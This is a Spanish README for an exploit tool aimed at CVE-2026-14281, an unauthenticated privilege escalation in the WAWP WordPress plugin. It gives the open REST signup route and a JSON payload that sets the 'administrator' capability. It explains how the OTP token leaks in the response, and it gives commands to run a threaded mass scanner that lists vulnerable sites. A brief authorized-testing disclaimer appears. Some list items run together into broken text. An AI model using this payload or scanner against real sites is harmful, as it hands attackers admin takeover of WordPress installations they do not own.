
Escáner masivo y exploit de objetivo único para CVE-2026-14281, una escalada de privilegios no autenticada en el plugin WordPress Automation Web Platform a través del registro REST.
Escáner masivo + Exploit de objetivo único para CVE-2026-14281 — una escalada de privilegios no autenticada en el plugin de WordPress Automation Web Platform (WAWP)
<= 4.8.6.
Gestión inadecuada de privilegios (CWE-269) en el plugin de WordPress Automation Web Platform (de 101gen). Las versiones <= 4.8.6 están afectadas.
| Campo | Valor |
|---|---|
| CVE | CVE-2026-14281 |
| Tipo | Escalada de privilegios no autenticada |
| CVSS | 9.8 (CRÍTICO) |
| Auth | No requiere |
| Afectados | Plugin WAWP <= 4.8.6 |
El plugin expone una ruta REST pública:
POST /wp-json/wawp/v1/signup/<op>
Sin comprobación de permisos. El handler copia wawp_custom_fields controlado por el atacante en update_user_meta() — sin lista de permitidos. El atacante establece:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
Resultado: la nueva cuenta obtiene el rol de administrador.
El token OTP (otp_transient) se devuelve en texto plano en el cuerpo de la respuesta. Una petición GET con ese token lo marca como verificado — sin necesidad de email/SMS.
/wp-json/wawp/v1/signup/ con wp_capabilities: administrator/wp-login.php con las nuevas credenciales/wp-admin/users.php3.7+requests, urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan: archivo de lista de objetivos de entrada, archivo de salida (por defecto vuln.txt), número de hilos (por defecto 20).
Verify Single: escribe YA, introduce la URL del objetivo. La herramienta crea un admin temporal, verifica y luego limpia.
vuln.txt contiene solo URLs vulnerables confirmadas, una por línea:
http://target1.com
https://target2.org
4.8.6/wp-json/wawp/v1/signup/For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
Úsalo con sabiduría. El conocimiento está destinado a proteger, no a destruir.
Enlace CVE: https://nvd.nist.gov/vuln/detail/CVE-2026-14281